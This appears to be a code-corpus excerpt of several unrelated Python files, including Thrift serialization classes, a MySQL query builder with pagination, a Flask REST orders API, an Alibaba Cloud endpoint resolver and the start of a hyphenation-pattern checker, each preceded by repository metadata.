oprot.writeStructBegin('LookupbparamResultEntry')
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 1)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 2)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 3)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 4)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 5)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 6)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 7)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 8)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.forbidden is not None:
oprot.writeFieldBegin('forbidden', TType.BOOL, 9)
oprot.writeBool(self.forbidden)
oprot.writeFieldEnd()
if self.average_duration is not None:
oprot.writeFieldBegin('average_duration', TType.I32, 10)
oprot.writeI32(self.average_duration)
oprot.writeFieldEnd()
if self.loss_protection is not None:
oprot.writeFieldBegin('loss_protection', TType.BOOL, 11)
oprot.writeBool(self.loss_protection)
oprot.writeFieldEnd()
if self.max_loss is not None:
oprot.writeFieldBegin('max_loss', TType.DOUBLE, 12)
oprot.writeDouble(self.max_loss)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 13)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.plan_only is not None:
oprot.writeFieldBegin('plan_only', TType.BOOL, 14)
oprot.writeBool(self.plan_only)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 15)
self.area_name.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LookupbparamResult(object):
"""
Attributes:
- bparams
- decimal_precision
- cost_round_up
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'bparams', (TType.STRUCT, (LookupbparamResultEntry, LookupbparamResultEntry.thrift_spec), False), None, ), # 1
(2, TType.I32, 'decimal_precision', None, None, ), # 2
(3, TType.BOOL, 'cost_round_up', None, None, ), # 3
)
def __init__(self, bparams=None, decimal_precision=None, cost_round_up=None,):
self.bparams = bparams
self.decimal_precision = decimal_precision
self.cost_round_up = cost_round_up
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.bparams = []
(_etype24, _size21) = iprot.readListBegin()
for _i25 in range(_size21):
_elem26 = LookupbparamResultEntry()
_elem26.read(iprot)
self.bparams.append(_elem26)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.decimal_precision = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.BOOL:
self.cost_round_up = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LookupbparamResult')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.bparams))
for iter27 in self.bparams:
iter27.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.decimal_precision is not None:
oprot.writeFieldBegin('decimal_precision', TType.I32, 2)
oprot.writeI32(self.decimal_precision)
oprot.writeFieldEnd()
if self.cost_round_up is not None:
oprot.writeFieldBegin('cost_round_up', TType.BOOL, 3)
oprot.writeBool(self.cost_round_up)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 1.273438 | 1 |
pysql.py | morfat/PySQL | 0 | 30980 | <filename>pysql.py
import MySQLdb
from urllib import parse
class PySQL:
"""
For making Mariadb / Mysql db queries
"""
FILTER_COMMANDS = {
"$eq":" = %s ",
"$in":" IN (%s) ",
"$nin":" NOT IN (%s) ",
"$neq":" != %s ",
"$lt":" < %s ",
"$lte":" <= %s ",
"$gt":" > %s ",
"$gte":" >= %s ",
"$contains":" LIKE %s ",#like %var%
"$ncontains":" NOT LIKE %s ",#
"$null":" IS NULL ", #if 1 else "IS NOT NULL" if 0
"$sw":" LIKE %s ",#starts with . like %var
"$ew":" LIKE %s "# endswith like var%
}
def __init__(self,user,password,db,host,port):
self._mysqldb_connection = MySQLdb.connect(user=user,passwd=password,db=db,host=host,port=port)
def commit(self):
return self._mysqldb_connection.commit()
def rollback(self):
return self._mysqldb_connection.rollback()
def close(self):
return self._mysqldb_connection.close()
def execute(self,sql,params=None,many=None,dict_cursor=True):
#runs the db query . can also be used to run raw queries directly
""" by default returns cursor object """
if dict_cursor:
self.cursor = self._mysqldb_connection.cursor(MySQLdb.cursors.DictCursor)
else:
self.cursor = self._mysqldb_connection.cursor()
if many:
self.cursor.executemany(sql,params)
else:
self.cursor.execute(sql,params)
return self.cursor
#PySQL specific method begin from here
def __getattr__(self,item):
self.table_name = item
self.columns = ['*'] #columns selected for display of records
self.query_params = [] #for db filtering . parameters entered.
self.sql = ''
self.where_sql = ''
self.join_sql = ''
self.order_by_sql = ''
self.group_by_sql = ''
self.limit_sql = ''
self.cursor = None
return self
def __make_table_column(self,column,table_name=None):
"""Example
Input: => Output:
users.id => users.id
name => users.name
"""
if '.' in column:
return column
return "{}.{}".format(table_name,column) if table_name else "{}.{}".format(self.table_name,column)
def get_columns(self):
return ','.join([self.__make_table_column(c) for c in self.columns])
def fields(self,columns):
#sets columns to select
""" Example: ['id','name']
"""
self.columns = columns
return self
def fetch(self,limit=None):
if not self.cursor:
self.__make_select_sql(limit=limit)
print (self.sql)
print (self.query_params)
self.cursor = self.execute(self.sql,self.query_params)
results = self.cursor.fetchall()
self.cursor.close()
return results
def fetch_one(self):
if not self.cursor:
self.__make_select_sql(limit=None)
self.cursor = self.execute(self.sql,self.query_params)
result = self.cursor.fetchone()
self.cursor.close()
return result
def __set_where(self,where_sql):
if self.where_sql:
#check if where starts with AND or OR
where_sql = where_sql.strip()
if where_sql.startswith('OR') or where_sql.startswith("AND"):
self.where_sql = self.where_sql + " " + where_sql
else:
self.where_sql = self.where_sql + " AND " + where_sql
else:
self.where_sql = " WHERE {} ".format(where_sql)
def __make_sql(self,sql):
if sql:
self.sql = self.sql + sql
def __make_select_sql(self,limit):
self.sql = "SELECT {} FROM {} ".format(self.get_columns(),self.table_name)
self.__make_sql(self.join_sql)
self.__make_sql(self.where_sql)
self.__make_sql(self.group_by_sql)
self.__make_sql(self.order_by_sql)
self.__limit(limit)
def __make_filter(self,k,v):
#check if val is dict
col = k
filter_v = None #the filter value e.g name like '%mosoti%'
param = v
print ("Param: ",param, "column:",col)
if isinstance(param,dict):
filter_v , param = [(k,v) for k,v in param.items()][0]
else:
filter_v = "$eq"
if filter_v == "$null":
if v.get(filter_v) is False:
filter_v = " IS NOT NULL "
else:
filter_v = " IS NULL "
param = None
elif filter_v == "$in":
filter_v = " IN ({}) ".format(','.join(['%s' for i in param]))
elif filter_v == "$nin":
filter_v = " NOT IN ({}) ".format(','.join(['%s' for i in param]))
else:
if filter_v == '$contains' or filter_v == "$ncontains":
param = '%{}%'.format(str(param))
elif filter_v == "$sw":
param = '{}%'.format(str(param))
elif filter_v == "$ew":
param = '%{}'.format(str(param))
filter_v = self.FILTER_COMMANDS.get(filter_v)
return (param,filter_v,)
def __make_or_query_filter(self,data_list):
qs_l =[]
for d in data_list:
for ok,ov in d.items():
param,filter_v = self.__make_filter(ok,ov)
self.__build_query_params(param)
q = self.__make_table_column(ok) + filter_v
qs_l.append(q)
query = ' OR '.join(qs_l)
return query
def __build_query_params(self,param):
#appends params to existinig
if param:
if isinstance(param,list):
for p in param:
self.query_params.append(p)
else:
self.query_params.append(param)
def __filter_query(self,filter_data):
#make filters
filter_q_l = []
for k,v in filter_data.items():
if k == '$or':
#make for or
qs_l =self.__make_or_query_filter(filter_data.get('$or'))
query = " OR " + qs_l
filter_q_l.append(query)
elif k == '$xor':
#make for or
qs_l = self.__make_or_query_filter(filter_data.get('$xor'))
query = " AND ( " + qs_l + " )"
filter_q_l.append(query)
else:
param,filter_v = self.__make_filter(k,v)
self.__build_query_params(param)
q = self.__make_table_column(k) + filter_v
if len(filter_q_l) == 0:
q = q
else:
q = " AND " + q
filter_q_l.append(q)
return filter_q_l
def filter(self,filter_data):
"""
Filters Requests
#example full including or
{ "name":{"$contains":"mosoti"},
"age":{"$lte":30},
"msisdn":"2541234567",
"$or":[{ "name":{"$contains":"mogaka"}},
{"age":31}
], #this evaluates to => .. OR name like '%mogaka%' OR age=31
"$xor":[{ "name":{"$contains":"mogaka"}},
{"age":31}
] # this evalautes to =>... AND ( name like '%mogaka%' OR age=31 )
}
"""
#reset vals /parameters so that we begin here
if filter_data:
filter_q_l = self.__filter_query(filter_data)
filters_qls = ''.join(filter_q_l).strip()
if filters_qls.startswith("AND"):
filters_qls = filters_qls[3:]
elif filters_qls.startswith("OR"):
filters_qls = filters_qls[2:]
self.__set_where(filters_qls)
return self
def fetch_paginated(self,paginator_obj):
#receives paginator object
order_by = paginator_obj.get_order_by()
filter_data = paginator_obj.get_filter_data()
page_size = paginator_obj.page_size
self.filter(filter_data)
self.order_by(order_by)
results = self.fetch(limit = page_size)
pagination_data = paginator_obj.get_pagination_data(results)
return {"results":results,"pagination":pagination_data}
def __limit(self,limit):
if limit:
self.__build_query_params(limit)
self.__make_sql(' LIMIT %s ')
def __get_order_by_text(self,val):
""" Receives string e.g -id or name """
if val.startswith('-'):
return "{} DESC".format(self.__make_table_column(val[1:]))
else:
return "{} ASC".format(self.__make_table_column(val))
def order_by(self,order_by_fields):
"""Expects list of fields e.g ['-id','name'] where - is DESC"""
order_by_sql = ','.join([self.__get_order_by_text(v) for v in order_by_fields])
if self.order_by_sql:
self.order_by_sql = self.order_by_sql + ' , ' + order_by_sql
else:
self.order_by_sql = " ORDER BY " + order_by_sql
return self
def group_by(self,group_by_fields):
""" Expects fields in list ['id','name'] ... """
group_by_sql = ','.join([self.__make_table_column(v) for v in group_by_fields])
if self.group_by_sql:
self.group_by_sql = self.group_by_sql + group_by_sql
else:
self.group_by_sql = " GROUP BY " + group_by_sql
return self
def __make_join(self,join_type,table_name,condition_data,related_fields):
""" makes join sql based on type of join and tables """
on_sql = []
for k,v in condition_data.items():
on_sql.append("{} = {} ".format(self.__make_table_column(k),self.__make_table_column(v,table_name)))
on_sql_str = ' ON {} ' .format(' AND '.join(on_sql))
join_type_sql = '{} {} '.format(join_type,table_name)
self.join_sql = self.join_sql + join_type_sql + on_sql_str
#append the columns to select based on related fields
if related_fields:
self.columns.extend([self.__make_table_column(c,table_name) for c in related_fields])
def inner_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... INNER JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('INNER JOIN',table_name,condition,related_fields)
return self
def right_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... RIGHT JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('RIGHT JOIN',table_name,condition,related_fields)
return self
def left_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... LEFT JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('LEFT JOIN',table_name,condition,related_fields)
return self
def update(self,new_data,limit=None):
""" set this new data as new details
Returns cursor object
"""
col_set = ','.join([" {} = %s ".format(k) for k,v in new_data.items()])
filter_params = self.query_params
self.query_params = []
update_params = [v for k,v in new_data.items()]
update_params.extend(filter_params) #we start with update thn filter
self.__build_query_params(update_params)
self.sql = "UPDATE {} SET {} ".format(self.table_name,col_set)
self.__make_sql(self.where_sql)
self.__limit(limit)
print(self.query_params)
print (self.sql)
return self.execute(self.sql,self.query_params)
def delete(self,limit=None):
""" Delete with given limit """
self.sql = "DELETE FROM {} ".format(self.table_name)
self.__make_sql(self.where_sql)
self.__limit(limit)
print (self.sql)
return self.execute(self.sql,self.query_params)
def insert(self,data):
"""
Creates records to db table . Expects a dict of key abd values pair
"""
columns = []
params = []
for k,v in data.items():
columns.append(k)
params.append(v)
column_placeholders = ','.join(["%s" for v in columns])
columns = ','.join([v for v in columns])
self.query_params = params
self.sql = "INSERT INTO {}({}) VALUES({})".format(self.table_name,columns,column_placeholders)
print (self.sql)
print (self.query_params)
return self.execute(self.sql,self.query_params).lastrowid
class Paginator:
def __init__(self,max_page_size=None,url=None,page_number=None,page_size=None,last_seen=None,last_seen_field_name=None,direction=None):
self.page_number = int(page_number) if page_number else 1
self.max_page_size = max_page_size if max_page_size else 1000
if page_size:
if int(page_size) > self.max_page_size:
self.page_size = self.max_page_size
else:
self.page_size = int(page_size)
else:
self.page_size = 25
self.last_seen_field_name = last_seen_field_name if last_seen_field_name else 'id'
self.direction = direction
self.last_seen = last_seen
self.url = url
self._where_clause = ''
self._params = []
def get_order_by(self):
order_by = []
if self.page_number == 1 or self.direction == 'next':
order_by = ["-{}".format(self.last_seen_field_name)] #order descending
elif self.direction == 'prev':
order_by = ["{}".format(self.last_seen_field_name)] #order ascending
return order_by
def get_filter_data(self):
filter_data = None
if self.page_number == 1:
filter_data = {}
elif self.direction == 'prev':
filter_data = {
"{}".format(self.last_seen_field_name):{"$gt":"%s"%(self.last_seen)}
}
elif self.direction == 'next':
filter_data = {
"{}".format(self.last_seen_field_name):{"$lt":"%s"%(self.last_seen)}
}
return filter_data
def get_next_link(self,results_list):
page = self.page_number + 1
url = self.url
if len(results_list) < self.page_size:
return None
if self.direction == 'prev' and page != 2:
last_seen_dict = results_list[:-1][0]
else:
last_seen_dict = results_list[-1:][0]
url=self.replace_query_param(url, 'page', page)
url=self.replace_query_param(url, 'dir', 'next')
url=self.replace_query_param(url, 'last_seen', last_seen_dict.get(self.last_seen_field_name))
return url
def get_previous_link(self,results_list):
page=self.page_number - 1
url=self.url
if page == 0:
return None
elif len(results_list) == 0:
#return home link
url=self.remove_query_param(url, 'page')
url=self.remove_query_param(url, 'dir')
url=self.remove_query_param(url, 'last_seen')
return url
if self.direction == 'next' :
last_seen_dict = results_list[:-1][0]
else:
last_seen_dict = results_list[-1:][0]
#last_seen_dict = results_list[-1:][0]
url=self.replace_query_param(url, 'page', page)
url=self.replace_query_param(url, 'dir', 'prev')
url=self.replace_query_param(url, 'last_seen', last_seen_dict.get(self.last_seen_field_name))
return url
def replace_query_param(self,url, key, val):
"""
Given a URL and a key/val pair, set or replace an item in the query
parameters of the URL, and return the new URL.
"""
(scheme, netloc, path, query, fragment) = parse.urlsplit(url)
query_dict = parse.parse_qs(query, keep_blank_values=True)
query_dict[str(key)] = [val]
query = parse.urlencode(sorted(list(query_dict.items())), doseq=True)
return parse.urlunsplit((scheme, netloc, path, query, fragment))
def remove_query_param(self,url, key):
"""
Given a URL and a key/val pair, remove an item in the query
parameters of the URL, and return the new URL.
"""
(scheme, netloc, path, query, fragment) = parse.urlsplit(url)
query_dict = parse.parse_qs(query, keep_blank_values=True)
query_dict.pop(key, None)
query = parse.urlencode(sorted(list(query_dict.items())), doseq=True)
return parse.urlunsplit((scheme, netloc, path, query, fragment))
def get_pagination_data(self,results_list):
return {'page_size':self.page_size,
'next_url': self.get_next_link(results_list),
'previous_url': self.get_previous_link(results_list)
} | 2.328125 | 2 |
hidrocomp/graphics/genpareto.py | clebsonpy/HydroComp | 4 | 31108 | import scipy.stats as stat
import pandas as pd
import plotly.graph_objs as go
from hidrocomp.graphics.distribution_build import DistributionBuild
class GenPareto(DistributionBuild):
def __init__(self, title, shape, location, scale):
super().__init__(title, shape, location, scale)
def cumulative(self):
datas = self._data('cumulative')
data = [go.Scatter(x=datas['peaks'], y=datas['Cumulative'],
name=self.title, line=dict(color='rgb(128, 128, 128)',
width=2))]
bandxaxis = go.layout.XAxis(title="Vazão(m³/s)")
bandyaxis = go.layout.YAxis(title="Probabilidade")
layout = dict(title="GP - Acumulada: %s" % self.title,
showlegend=True,
width=945, height=827,
xaxis=bandxaxis,
yaxis=bandyaxis,
font=dict(family='Time New Roman', size=28, color='rgb(0,0,0)')
)
fig = dict(data=data, layout=layout)
return fig, data
def density(self):
datas = self._data('density')
data = [go.Scatter(x=datas['peaks'], y=datas['Density'],
name=self.title, line=dict(color='rgb(128, 128, 128)',
width=2))]
bandxaxis = go.layout.XAxis(title="Vazão(m³/s)")
bandyaxis = go.layout.YAxis(title="")
layout = dict(title="GP - Densidade: %s" % self.title,
showlegend=True,
width=945, height=827,
xaxis=bandxaxis,
yaxis=bandyaxis,
font=dict(family='Time New Roman', size=28, color='rgb(0,0,0)')
)
fig = dict(data=data, layout=layout)
return fig, data
def _data_density(self):
cumulative = self._data_cumulative()
density = stat.genpareto.pdf(cumulative['peaks'].values, self.shape,
loc=self.location, scale=self.scale)
dic = {'peaks': cumulative['peaks'].values, 'Density': density}
return pd.DataFrame(dic)
def _data_cumulative(self):
probability = list()
for i in range(1, 1000):
probability.append(i/1000)
quantiles = stat.genpareto.ppf(probability, self.shape,
loc=self.location,
scale=self.scale)
dic = {'peaks': quantiles, 'Cumulative': probability}
return pd.DataFrame(dic)
| 1.835938 | 2 |
preacher/compilation/yaml/tag/argument.py | ymoch/preacher | 3 | 31236 | <reponame>ymoch/preacher
from yaml import Node
from yamlen import Tag, TagContext
from preacher.compilation.argument import Argument
class ArgumentTag(Tag):
def construct(self, node: Node, context: TagContext) -> object:
key = context.constructor.construct_scalar(node) # type: ignore
return Argument(key)
| 0.933594 | 1 |
orders/api.py | terryjbates/restbucks | 0 | 31364 | <reponame>terryjbates/restbucks
import os
from datetime import datetime
from dateutil import parser as datetime_parser
from dateutil.tz import tzutc
from flask import Flask, url_for, jsonify, request
from flask.ext.sqlalchemy import SQLAlchemy
from utils import split_url
basedir = os.path.abspath(os.path.dirname(__file__))
db_path = os.path.join(basedir, '../data.sqlite')
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + db_path
db = SQLAlchemy(app)
class ValidationError(ValueError):
pass
@app.errorhandler(ValidationError)
def bad_request(e):
response = jsonify({'status': 400, 'error': 'bad request',
'message': e.args[0]})
response.status_code = 400
return response
@app.errorhandler(404)
def not_found(e):
response = jsonify({'status': 404, 'error': 'not found',
'message': 'invalid resource URI'})
response.status_code = 404
return response
@app.errorhandler(405)
def method_not_supported(e):
response = jsonify({'status': 405, 'error': 'method not supported',
'message': 'the method is not supported'})
response.status_code = 405
return response
@app.errorhandler(500)
def internal_server_error(e):
response = jsonify({'status': 500, 'error': 'internal server error',
'message': e.args[0]})
response.status_code = 500
return response
class Customer(db.Model):
__tablename__ = 'customers'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), index=True)
orders = db.relationship('Order', backref='customer', lazy='dynamic')
def get_url(self):
return url_for('get_customer', id=self.id, _external=True)
def export_data(self):
return {
'self_url': self.get_url(),
'name': self.name,
'orders_url': url_for('get_customer_orders', id=self.id,
_external=True)
}
def import_data(self, data):
try:
self.name = data['name']
except KeyError as e:
raise ValidationError('Invalid customer: missing ' + e.args[0])
return self
class Product(db.Model):
__tablename__ = 'products'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), index=True)
items = db.relationship('Item', backref='product', lazy='dynamic')
def get_url(self):
return url_for('get_product', id=self.id, _external=True)
def export_data(self):
return {
'self_url': self.get_url(),
'name': self.name
}
def import_data(self, data):
try:
self.name = data['name']
except KeyError as e:
raise ValidationError('Invalid product: missing ' + e.args[0])
return self
class Order(db.Model):
__tablename__ = 'orders'
id = db.Column(db.Integer, primary_key=True)
customer_id = db.Column(db.Integer, db.ForeignKey('customers.id'),
index=True)
date = db.Column(db.DateTime, default=datetime.now)
items = db.relationship('Item', backref='order', lazy='dynamic',
cascade='all, delete-orphan')
def get_url(self):
return url_for('get_order', id=self.id, _external=True)
def export_data(self):
return {
'self_url': self.get_url(),
'customer_url': self.customer.get_url(),
'date': self.date.isoformat() + 'Z',
'items_url': url_for('get_order_items', id=self.id,
_external=True)
}
def import_data(self, data):
try:
self.date = datetime_parser.parse(data['date']).astimezone(
tzutc()).replace(tzinfo=None)
except KeyError as e:
raise ValidationError('Invalid order: missing ' + e.args[0])
return self
class Item(db.Model):
__tablename__ = 'items'
id = db.Column(db.Integer, primary_key=True)
order_id = db.Column(db.Integer, db.ForeignKey('orders.id'), index=True)
product_id = db.Column(db.Integer, db.ForeignKey('products.id'),
index=True)
quantity = db.Column(db.Integer)
def get_url(self):
return url_for('get_item', id=self.id, _external=True)
def export_data(self):
return {
'self_url': self.get_url(),
'order_url': self.order.get_url(),
'product_url': self.product.get_url(),
'quantity': self.quantity
}
def import_data(self, data):
try:
endpoint, args = split_url(data['product_url'])
self.quantity = int(data['quantity'])
except KeyError as e:
raise ValidationError('Invalid order: missing ' + e.args[0])
if endpoint != 'get_product' or not 'id' in args:
raise ValidationError('Invalid product URL: ' +
data['product_url'])
self.product = Product.query.get(args['id'])
if self.product is None:
raise ValidationError('Invalid product URL: ' +
data['product_url'])
return self
@app.route('/customers/', methods=['GET'])
def get_customers():
return jsonify({'customers': [customer.get_url() for customer in
Customer.query.all()]})
@app.route('/customers/<int:id>', methods=['GET'])
def get_customer(id):
return jsonify(Customer.query.get_or_404(id).export_data())
@app.route('/customers/', methods=['POST'])
def new_customer():
customer = Customer()
customer.import_data(request.json)
db.session.add(customer)
db.session.commit()
return jsonify({}), 201, {'Location': customer.get_url()}
@app.route('/customers/<int:id>', methods=['PUT'])
def edit_customer(id):
customer = Customer.query.get_or_404(id)
customer.import_data(request.json)
db.session.add(customer)
db.session.commit()
return jsonify({})
@app.route('/products/', methods=['GET'])
def get_products():
return jsonify({'products': [product.get_url() for product in
Product.query.all()]})
@app.route('/products/<int:id>', methods=['GET'])
def get_product(id):
return jsonify(Product.query.get_or_404(id).export_data())
@app.route('/products/', methods=['POST'])
def new_product():
product = Product()
product.import_data(request.json)
db.session.add(product)
db.session.commit()
return jsonify({}), 201, {'Location': product.get_url()}
@app.route('/products/<int:id>', methods=['PUT'])
def edit_product(id):
product = Product.query.get_or_404(id)
product.import_data(request.json)
db.session.add(product)
db.session.commit()
return jsonify({})
@app.route('/orders/', methods=['GET'])
def get_orders():
return jsonify({'orders': [order.get_url() for order in Order.query.all()]})
@app.route('/customers/<int:id>/orders/', methods=['GET'])
def get_customer_orders(id):
customer = Customer.query.get_or_404(id)
return jsonify({'orders': [order.get_url() for order in
customer.orders.all()]})
@app.route('/orders/<int:id>', methods=['GET'])
def get_order(id):
return jsonify(Order.query.get_or_404(id).export_data())
@app.route('/customers/<int:id>/orders/', methods=['POST'])
def new_customer_order(id):
customer = Customer.query.get_or_404(id)
order = Order(customer=customer)
order.import_data(request.json)
db.session.add(order)
db.session.commit()
return jsonify({}), 201, {'Location': order.get_url()}
@app.route('/orders/<int:id>', methods=['PUT'])
def edit_order(id):
order = Order.query.get_or_404(id)
order.import_data(request.json)
db.session.add(order)
db.session.commit()
return jsonify({})
@app.route('/orders/<int:id>', methods=['DELETE'])
def delete_order(id):
order = Order.query.get_or_404(id)
db.session.delete(order)
db.session.commit()
return jsonify({})
@app.route('/orders/<int:id>/items/', methods=['GET'])
def get_order_items(id):
order = Order.query.get_or_404(id)
return jsonify({'items': [item.get_url() for item in order.items.all()]})
@app.route('/items/<int:id>', methods=['GET'])
def get_item(id):
return jsonify(Item.query.get_or_404(id).export_data())
@app.route('/orders/<int:id>/items/', methods=['POST'])
def new_order_item(id):
order = Order.query.get_or_404(id)
item = Item(order=order)
item.import_data(request.json)
db.session.add(item)
db.session.commit()
return jsonify({}), 201, {'Location': item.get_url()}
@app.route('/items/<int:id>', methods=['PUT'])
def edit_item(id):
item = Item.query.get_or_404(id)
item.import_data(request.json)
db.session.add(item)
db.session.commit()
return jsonify({})
@app.route('/items/<int:id>', methods=['DELETE'])
def delete_item(id):
item = Item.query.get_or_404(id)
db.session.delete(item)
db.session.commit()
return jsonify({})
if __name__ == '__main__':
db.create_all()
app.run(debug=True)
| 1.484375 | 1 |
alibabacloud/endpoint/default_endpoint_resolver.py | wallisyan/alibabacloud-python-sdk-v2 | 0 | 31492 | <reponame>wallisyan/alibabacloud-python-sdk-v2<gh_stars>0
# Copyright 2018 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from alibabacloud.endpoint import EndpointResolver
from alibabacloud.endpoint.chained_endpoint_resolver import ChainedEndpointResolver
from alibabacloud.endpoint.local_config_global_endpoint_resolver \
import LocalConfigGlobalEndpointResolver
from alibabacloud.endpoint.local_config_regional_endpoint_resolver \
import LocalConfigRegionalEndpointResolver
from alibabacloud.endpoint.location_service_endpoint_resolver \
import LocationServiceEndpointResolver
from alibabacloud.endpoint.user_customized_endpoint_resolver import UserCustomizedEndpointResolver
class DefaultEndpointResolver(EndpointResolver):
"""
`Alibaba Cloud Python` endpoint 解析链
.. note::
Deprecated use for add_endpoint and modify_endpoint
Not recommended
"""
predefined_endpoint_resolver = UserCustomizedEndpointResolver()
def __init__(self, config, credentials_provider, user_config=None):
self._user_customized_endpoint_resolver = UserCustomizedEndpointResolver()
endpoint_resolvers = [
self.predefined_endpoint_resolver,
self._user_customized_endpoint_resolver,
LocalConfigRegionalEndpointResolver(user_config),
LocalConfigGlobalEndpointResolver(user_config),
LocationServiceEndpointResolver(config, credentials_provider),
]
self._resolver = ChainedEndpointResolver(endpoint_resolvers)
def resolve(self, request):
return self._resolver.resolve(request)
def put_endpoint_entry(self, region_id, product_code, endpoint):
self._user_customized_endpoint_resolver.put_endpoint_entry(region_id, product_code,
endpoint)
| 1.195313 | 1 |
vpc_hyp2/ansible/roles/vm_create/files/variables.py | dhanraj-vedanth/IaaS_VPC_CDN | 0 | 31620 | <filename>vpc_hyp2/ansible/roles/vm_create/files/variables.py
dom_list = ['an_h1']
| 0.229492 | 0 |
scripts/checkPatterns.py | bbloomf/hyphen-la | 18 | 31748 | <filename>scripts/checkPatterns.py<gh_stars>10-100
#!/usr/bin/env python3
"""
Hyphenation file checker
Copyright (C) 2016 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import argparse
import sys
import re
parser = argparse.ArgumentParser(
description='Tiny script to check hyphenation patterns (against duplicated, invalid, etc.).',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('path',
help='Path to a pattern file',
action='store', type = argparse.FileType('r'))
args = parser.parse_args()
seenPatterns = {}
line = 0
nbErrors = 0
for pat in args.path:
line += 1
pat = pat.strip('\n')
if re.search('\s', pat):
print(' line %d: pattern \'%s\' contains space' % (line, pat), file=sys.stderr)
nbErrors += 1
reducedPat = re.sub(r'\d', '', pat)
if reducedPat in seenPatterns:
